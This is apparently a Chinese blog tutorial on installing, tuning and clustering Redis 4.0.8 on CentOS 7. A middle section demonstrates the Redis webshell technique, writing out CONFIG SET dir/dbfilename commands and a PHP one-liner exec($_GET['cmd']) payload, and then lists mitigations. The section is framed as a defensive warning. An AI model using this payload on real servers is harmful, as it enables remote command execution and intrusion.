CentOS7.X安装Redis-4.0.8以及Redis集群搭建

最新推荐文章于 2019-09-11 14:18:15 发布
最新推荐文章于 2019-09-11 14:18:15 发布
阅读量170 收藏
点赞数
分类专栏: 后端 文章标签: linux redis


安装redis

  1. 安装前的准备

    yum install \
vim \
wget \
make \
gcc \
gcc-c++ \
automake \
autoconf \
-y \

  2. 下载解压并安装

    cd /root
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar -zxzf redis-4.0.8.tar.gz
cd redis-4.0.8
make PREFIX=/usr/local/redis/ install

  3. 创建配置中要求的数据文件存储位置

    mkdir /data
mkdir /data/redis
mkdir /usr/local/redis/log

  4. 添加修改配置文件参考配置

    cp ./redis.conf /usr/local/redis
vim /usr/local/redis/redis.conf

# IP绑定
bind 127.0.0.1 192.168.0.111
# 保护模式(开启条件为各redis之间可以互相通信,做集群不可开启)
protected-mode yes
# 访问端口
port 6379
# 连接超时,单位S,0为不启用超时
timeout 0
# 以守护进程运行
daemonize yes
# 数据文件路径
dir /data/redis
# 进程ID文件的路径
pidfile /usr/local/redis/log/redis.pid
# 日志文件路径
logfile /usr/local/redis/log/redis.log
# 开启键过期删除通知
notify-keyspace-events Ex

ESC
:wq

# 以下安全配置选项仅作参考
    # 禁用部分危险命令
    rename-command FLUSHALL ""
    rename-command CONFIG   ""
    rename-command EVAL     ""
    # 添加访问密码
    requirepass ********
    # IP绑定本机
    bind 127.0.0.1

  5. 性能优化

    # 编辑/etc/rc.local
vim /etc/rc.local

echo never > /sys/kernel/mm/transparent_hugepage/enabled

ESC
:wq

# 添加/etc/rc.local执行权限
chmod +x /etc/rc.d/rc.local

# 编辑/etc/sysctl.conf
vim /etc/sysctl.conf

vm.overcommit_memory = 1
net.core.somaxconn = 1024

ESC
:wq

# 立即解决
echo never > /sys/kernel/mm/transparent_hugepage/enabled
echo 1024 > /proc/sys/net/core/somaxconn
sysctl vm.overcommit_memory=1
sysctl -p

  6. 修改目录归属

    useradd -s /sbin/nologin -M redis
chown -R redis:redis /data/redis
chown -R redis:redis /usr/local/redis

  7. 启动redis并设置开机启动

    # 进入单元文件目录
cd /etc/systemd/system

# 创建redis单元文件,格式为: [单元文件名].[单元文件类型]
vim redis.service

[Unit]
Description=Start redis on boot.
After=default.target network.target

[Service]
User=redis
Group=redis
Type=forking
PIDFile=/usr/local/redis/log/redis.pid
ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=false
Restart=always

[Install]
WantedBy=multi-user.target

ESC
:wq

# 修改文件权限为只有root用户可以编辑该文件
chown -R root:root /etc/systemd/system/redis.service
chmod -R 644 /etc/systemd/system/redis.service

# 更新systemd
systemctl daemon-reload
systemctl enable redis
systemctl start redis

  8. 存入数据

    /usr/local/redis/bin/redis-cli -h 127.0.0.1

set num 123
save
get num
quit

  9. 批量删除匹配规则数据

    redis-cli keys [匹配规则]|xargs redis-cli del

Redis宕机 aof文件损坏 启动失败

  1. 拷贝aof文件

  2. 修复坏损的aof文件

    redis-check-aof --fix [aof文件名]
  3. 重新启动Redis

Redis漏洞webshell的利用

参考链接

  1. Redis该漏洞用到的原理如下

    1. redis原生支持通过'redis-cli>config set'在不重启redis服务的情况
      下,动态修改配置dir、dbfilename;
    2. redis的配置中如果指定'dir /www/'和'dbfilename test.php',则当执
      行save命令时,会在/www/目录下生成一个数据存储文件test.php,虽然该文

    件是一个二进制文件,但其内容中包含保存的数据的值,如果/www/目录为web
    目录,则/www/test.php则会被人利用,成为入侵你服务器的入口;

  2. 漏洞举例(这是一个负面教材)

    1. redis以超级管理员用户root运行
    2. Nginx以超级管理员用户root启动,子进程也以root运行

    3. web服务器为nginx,并做如下配置:

      server {
    listen       x;
    server_name  xxx.xxx.com;
    root         /www;

    location / {
        index    index.php index.html index.htm;
    }

    location ~ \.php$ {
        fastcgi_index  index.php;
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}

    4. 通过redis-cli执行了以下命令

      config set dir /www/
config set dbfilename test.php
set test "<?php exec($_GET['cmd']); ?>"
save

    5. 这时候可怕的事情出现了

      1. 在/www/目录下,存在test.php文件,它可以通过http://xxx.xxx.com/test.php访问到
      2. 如果现在访问http://xxx.xxx.com/test.php?cmd=xxx,那么xxx就会被以root用户执行(xxx为任意linux命令)

Redis漏洞webshell的防范

  1. 不要线上使用redis的web管理工具
  2. redis以低权限用户运行(如rediser等让人想不到的用户名)
  3. redis仅允许通过本机和内网访问(bind 127.0.0.1 192.168.0.12/24)
  4. redis禁用config命令(在配置文件中可以禁用rename-command CONFIG "")
  5. web服务子进程以低权限用户运行(因为webshell的运行用户为web服务的子进程)

redis集群(cluster方式)

  1. 集群前的配置(单机两服务测试6379,6380)

    # 内网IP:192.168.0.100

  2. 修改redis.conf

    vim /usr/local/redis/redis.conf

# 启用cluster
cluster-enabled yes
# 调用cluster配置文件
cluster-config-file nodes-6379.conf
# 集群超时
cluster-node-timeout 15000
# 关闭宕机全停
cluster-require-full-coverage no
# 集群从属元素个数
cluster-slave-validity-factor 10
# 从机数最低迁移值(master至少有两台slave,才能做slave迁移)
cluster-migration-barrier 1

ESC
:wq

  3. 配置文件添加

    yum install ruby
gem install redis

cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf

mkdir /usr/local/redis/data/6379
mkdir /usr/local/redis/data/6380

  4. 修改redis-6379.conf

    vim /usr/local/redis/redis-6379.conf

unixsocket /usr/local/redis/data/6379/redis.sock
pidfile /usr/local/redis/log/redis_6379.pid
logfile /usr/local/redis/log/redis_6379.log
dir /usr/local/redis/data/6379/
bind 192.168.0.100
port 6379

ESC
:wq

  5. 修改redis-6380.conf

    vim /usr/local/redis/redis-6380.conf

unixsocket /usr/local/redis/data/6380/redis.sock
pidfile /usr/local/redis/log/redis_6380.pid
logfile "/usr/local/redis/log/redis_6380.log"
dir /usr/local/redis/data/6380/
bind 192.168.0.100
port 6380

ESC
:wq

  6. 修改开机启动

    vim /etc/rc.local

/usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
/usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf

ESC
:wq

  7. 创建cluster

    cd /root/redis/src/
# 查看帮助
./redis-trib.rb help
# 添加绑定
./redis-trib.rb create --replicas 1 192.168.0.100:6379 192.168.0.100:6380

  8. 集群测试

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 -c

  9. 正常关闭(不要强制关闭)

    /usr/local/redis/bin/redis-cli -h 192.168.0.100 -p 6379 shutdown

安全与风控 数据存储与数据库系统研发与运维 linux php redisLOG 配置 cluster 集群 testindex vim 安全问道 esc

yuer629
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis cluster 4.0.8 集群配置文档
09-12
文档中介绍Linux7/CentOS7 下的redis cluster 集群搭建。使用的版本是4.0.8 包含节点创建、删除,移槽等操作。
搭建Redis4.0.8集群
weixin_43674090的博客
08-30 457
一、搭建管理主机机 二、创建6台redis服务器 三、创建redis集群 四、测试redis集群 五、管理redis集群
Redis4.0.8安装以及集群的配置
DragonFreedom的博客
03-12 3332
1、下载 redis-4.0.8.tar.gz我的环境是centos7.3,redis使用4.0.8,后边的ruby使用2.3.3这个就不多说了,下载解压,不会了百度一下注意:中间遇到问题可以参考  http://blog.csdn.net/DragonFreedom/article/details/795126862、安装解压完进入解压目录,进行以下两步操作,注意第二行命令的prefix指的是你...
redis-4.0.8在centos集群安装
03-31 1259
一、集群机器三台服务器:先设置hosts192.168.2.11  node1192.168.2.12  node2192.168.2.13 node3端口分配:node1:7000 node1:7001  node2:7002  node2:7003  node3:7004  node3:70051.下载redis-4.0.8wget http://download.redis.io/re...
CentOS7.x 离线安装redis-cluster所需包
03-07
改压缩包中含了centos7.x离线安装redis-cluster的所有相关文件,包括ruby-2.4.1.tar.gz,rubygems-2.7.6.tgz,zlib-1.2.11.tar.gz,redis-4.0.2.gem,tcl8.6.8-src.tar.gz
redis-3.0.0.tar和redis-3.0.0.gem.rar
10-29
RedisCentOS系统中创建集群可能会用到的安装包, 其中redis-3.0.0.tar是Redis服务, redis-3.0.0.gem是Redis通过ruby创建集群要用到的包
CentOS7安装搭建Redis-4.0.6
09-29
CentOS7安装搭建Redis-4.0.6的详细过程,有具体的截图说明过程。其中还包含Redis客户端是在Win下搭建,可以连接Redis服务,实现程序测试查看。 tar.gz、exe等包已经包含
Centos7.6.1810离线安装Redis5.0.14相关的rpm包
01-25
6 glibc-devel-2.17-260.el7.x86_64.rpm 5、6步跟centos版本相关 版本固定 7 libgomp-4.8.5-39.el7.x86_64.rpm 8 libgcc-4.8.5-39.el7.x86_64.rpm --replacefiles 9 gcc-4.8.5-39.el7.x86_64.rpm 10 gcc-c++-4.8.5-...
CentOS 7环境下安装Redis数据库详解
09-09
Redis是一个开源的、基于BSD许可证的,基于内存的、键值存储NoSQL数据本篇文章主要介绍了在CentOS 7环境下安装Redis数据库详解,有兴趣的可以了解一下。
redis4.0.8安装部署
weixin_33798152的博客
08-13 762
安装:1.获取redis资源wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.解压tar xzvf redis-4.0.8.tar.gz3.安装cd redis-4.0.8makecd srcmake install PREFIX=/usr/local/redis4.移动配置文件到安装目录下cd ../mkd...
Redis 4.0 集群搭建完美方案及注意事项
A_Gorilla的博客
07-05 3408
一、部署Redis集群环境准备1.准备6台redis服务器(默认配置)直接上操作不上理论安装教程详见《edis4.0.10 linux环境详细安装教程及介绍》2.配置redis集群1)在每台redis服务器做集群配置然后重启服务IP 规划:redis 服务器 ip 地址及端口规划– redisA 192.168.4.51 6351– redisB 192.168.4.52 6352– redisC...
Redis4.0.X 官方集群方案搭建
热门推荐
ljbmxsm的博客
08-02 1万+
1 下载编译Reids wget http://download.redis.io/releases/redis-4.0.1.tar.gz tar xzf redis-4.0.1.tar.gz cd redis-4.0.1 make注意:在执行make的是时候确保包含了编译所需的工具包。阿里云Centos7.0 编译没有问题直接通过2修改配置文件port 7000 cluster-enable
Redis 3.2.1集群搭建
weixin_34409741的博客
07-29 225
一、概述     Redis3.0版本之后支持Cluster. 1.1、redis cluster的现状    目前redis支持的cluster特性:   1):节点自动发现   2):slave-&gt;master 选举,集群容错   3):Hot resharding:在线分片   4):进群管理:cluster xxx   5):基于配置(nodes-port.conf)...
centos7.3安装redis4.0.8主3从集群
qq_19291967的博客
04-15 205
配置域名192.168.241.101 paascloud-redis-001192.168.241.102 paascloud-redis-002192.168.241.103 paascloud-redis-003这里写图片描述下载1wget http://download.redis.io/releases/redis-4.0.8.tar.gz解压12# tar -zxvf redis-4....
redis4.0.6集群搭建以及开启认证
Bowen.szx
12-14 2495
Redis集群搭建 环境:centos6.8 Redis版本:4.0.6   1. 安装ruby及ruby运行使用的包 yum install -y ruby rubygems gem install redis --version 3.0.0   (注意:gem install redis --version 3.0.0 失败的话,需要修改一下gem的源:gem sources ...
redis4.0.2版本集群搭建
feinifi的博客
11-28 3427
redhat7单机多节点搭建redis4.0.2集群
构建高可用redis(4.0.8)缓存集群-根据图灵公开课完整实现搭建
Vincent
06-03 1392
redis 主从模式 单体应用,系统中只有一台redis服务器,只有一台时候有单点的问题。 redis升级 主从形式: 升级主从后,从redis 服务器不对外提供服务,只是从主服务器哪里同步数据;一旦主redis服务器不能提供服务后,前台运维人员手动切换直接配置调用从Redis服务器。 这样主从升级后还可以进行读写分离,让读取redis服务直接调用从redis服务器数据,写数据调用...
redis4.0集群搭建
w2909526的博客
09-11 1634
1,安装单机版Redis centos7可以yum直接安装,也可以通过源码包安装,以下仅展示源码编译安装 安装依赖 [root@localhost]# yum install gcc -y 下载redis4.0 [root@localhost]# wget http://download.redis.io/releases/redis-4.0.10.tar.gz [root@localhost]#...
centos7系统-bash: redis-cli: command not found
最新发布
01-21
CentOS 7系统中,如果出现"-bash: redis-cli: command not found"的错误提示,可能是因为redis-cli命令没有被正确地添加到系统的环境变量中。你可以尝试以下两种解决办法: 1. 将redis-cli命令复制到/usr/local/bin目录下: ```shell sudo cp /path/to/redis-cli /usr/local/bin/ ``` 请将"/path/to/redis-cli"替换为你实际的redis-cli命令所在的路径。 2. 直接在redis-cli所在的目录下执行命令: ```shell ./redis-cli ``` 这样就可以直接使用redis-cli命令了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值